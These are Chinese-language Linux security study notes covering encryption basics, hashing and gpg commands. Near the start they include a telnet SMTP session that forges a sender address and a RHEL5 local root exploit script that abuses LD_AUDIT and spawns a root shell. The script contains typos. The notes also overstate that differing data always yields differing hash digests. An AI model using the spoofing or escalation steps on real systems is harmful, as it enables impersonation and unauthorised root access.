安全基础
仿冒别人给某人发邮件
telnet 127.0.0.1 25
helo a.com 命令
mail from:god@heaven.com 从某处发来的邮件
rcpt to:root 给某人发邮件
data 数据
subject:hello 邮件名
I miss you 邮件正文
How old are you
. 点代表结束
quit
redhat5普通用户提升管理员权限脚本
mkdir /tmp/wang
ln /bin/ping /tmp/wang/test
exec 3< /tmp/wang/test
rm -rf /tmp/wang
cat > /tmp/wang.c <<eof
void _attribute_((constrector)) init()
{
setuid(0);
system(“/bin/bash”);
}
eof
gcc -w -fPIC -shared -o /tmp/wang /tmp/wang.c
LD_AUDIT=”$ORIGIN” exec /proc/self/fd/3 &> /dev/null
两种加密体系
加密算法
1算法可以公开
2密钥(口令)不公开
love
orzi 每一位字母向后移三位
凯撒密码
对称
data明文–加密key1–data’密文–解密key2–data明文
对称:key1==key2 加密解密都是相同密钥
非对称:key1 != key2 加密解密是不同密钥
非对称
公钥加密对应的另一把私钥解密 Pa,Sa
私钥加密对应的另一把公钥解密 Pb,Sb
数字签名,数据来源的确认
data明文–加密key1=Sa–data’密文–解密key2=Pa–data明文
DES:1G 2G 4分钟 8分钟 对称的
RSA:1G 1G 1分钟 64hour 非对称的
Pb[Sa(data)]
Sb{Pb[Sa(data)]}=Sa(data)
Pa{Sa(data)}=data
md5 128
sha1 160
sha512 512
hash(data)=digest 摘要(密钥)
1 data不同,摘要必不同(密钥)
2 摘要(密钥)相同,data相同
3 不论data大小,digest大小只能算法有关
4 hash算法,不可逆
md5sum case.sh 得出摘要 16进制 数据不变摘要之不变 得到摘要值推算不出data不可逆
sha1sum f1.sh 160位的16进制数
两种算法已被破解 山东大学教授王小云
sha512sum file
1 Pb[Sa(data)]
2 Pb{data+Sa[hash(data)]}
Sb{Pb{data+Sa[hash(data)]}}=data+Sa[hash(data)]
hash(data)=A
Pa{Sa[hash(data)]}=hash(data)=B
A=B?
3 对称 非 hash
key{data+Sa[hash(data)]}+Pb(key)
密钥交换
DH(Deffie-Hellman)
大素数(大质数)能够被1和自己整除的数字
rpm -V bash 查看文件中元数据是否发生变化,包校验
对称密钥
gpg -c file 加密
gpg -d file.gpg 解密
gpg -o file1 -d file.gpg
非对称密钥
gpg –gen–key 生成密钥对
gpg –list–key
cd .gnupg/ 存放生成的密钥的目录
往别的用户导公钥
gpg -a –export -o /app/file.pubkey 生成易读的格式导出到文件
scp … 拷贝
(7)gpg –import /app/file.pub.key 导入公钥
gpg -e -r magedu(公钥) file 用magedu的公钥加密文件
scp .. 拷贝
(6)gpg -d file.gpg 解密
本文来自投稿,不代表Linux运维部落立场,如若转载,请注明出处:http://www.178linux.com/91185